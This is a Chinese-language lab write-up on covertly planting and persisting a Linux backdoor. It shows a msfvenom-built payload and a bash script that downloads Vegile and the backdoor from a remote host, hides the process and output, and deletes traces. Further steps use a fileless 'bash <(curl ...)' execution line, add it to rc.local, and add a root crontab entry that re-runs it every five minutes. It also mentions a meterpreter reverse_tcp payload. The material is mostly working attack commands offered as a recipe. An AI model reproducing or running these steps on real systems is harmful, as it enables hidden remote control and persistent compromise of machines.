思路
1.準備好木馬程序backdoor放到/var/www/html目錄下。
2.編寫自動化腳本
1)在/var/www/html下創建腳本
2) 切換到工作目錄
3) 用&&命令符把vegile執行後門命令的步驟用&&拼接。&&上一條執行成功後再執行&&後的下一條。
4) 因爲vegile有個步驟是按任意鍵退出,所以需要使用到命令符echo y |
5.) 因爲要隱蔽進行,不能顯示輸出結果,所以要用到命令>> /dev/null 2>&1
6) 最後刪除vegile的所有包
3.執行自動化命令bash < (curl -s -L http://192.168.72.131/autobackdoor.sh) >> /dev/null 2>&1
4.也可以將後門執行命令添加到開機啓動項
實驗開始
1.準備後門,用msfvenom編寫了一個backdoor的後門。上傳了Vegile-master.zip。
2.編寫bash自動化腳本
代碼如下:
#切換目錄
cd /tmp/
#將Vegile隱藏執行後門的步驟用&&連接
#隱藏執行命令 >> /dev/null 2>&1
#Velige中需要按任意鍵退出,所以使用命令 echo y |
wget 192.168.72.136/Vegile-master.zip && unzip Vegile-master.zip && cd Vegile-master && wget 192.168.72.136/backdoor && chmod +x Vegile && chmod +x backdoor && echo y | ./Vegile --i backdoor >> /dev/null 2>&1
#刪除安裝包
rm -rf /tmp/Vegile-master.zip /tmp/Vegile-master
3.運行自動化腳本
代碼如下:
bash <(curl -s -L http://192.168.72.136/autobackdoor.sh) >> /dev/null 2>&1
curl -s -L #curl 是一個利用 URL 語法在命令行下迚行文件傳輸的工具,這樣好處是:本地丌會保存任何文件。
-s --silent #表示靜默模式不輸出任何內容
-L 跟 http 違接,組合使用的效果是把 http 違接中的文件下載到內存中,然後傳 bash,迚行執行。
>> /dev/null 2>&1不輸出任何信息
4.也可以將後門執行命令添加到開機啓動項
先給rc.load添加執行權限,因爲有的centos的rc.load沒有權限。
chmod +x /etc/rc.d/rc.local
添加到啓動項中
echo "bash <(curl -s -L http://192.168.72.136/autobackdoor.sh) >> /dev/null 2>&1" /etc/rc.d/rc.local
5.也可以將後門添加到計劃任務中
1.先給/etc/crontab授權。
vim /etc/crontab
2.將後門執行命令添加到計劃任務中。
*/5 * * * * root bash <(curl -s -L http://192.168.72.136/autobackdoor) >> /dev/null 2>&1保存退出就可以了。表示每五分鐘執行一次。
分 時 天 月 周
*/5 * * * *
注意:
分 時 天 月 周
*/5 * * * *
實驗時犯的錯:
1.獲取shell的時候把set payload linux/x64/meterpreter/reverse_tcp中的x64寫成了x86導致shell一直連接不上。
2.常把bash腳本的後綴名.sh忘掉。
3.在編寫.sh腳本的時候,要注意以下這個坑。
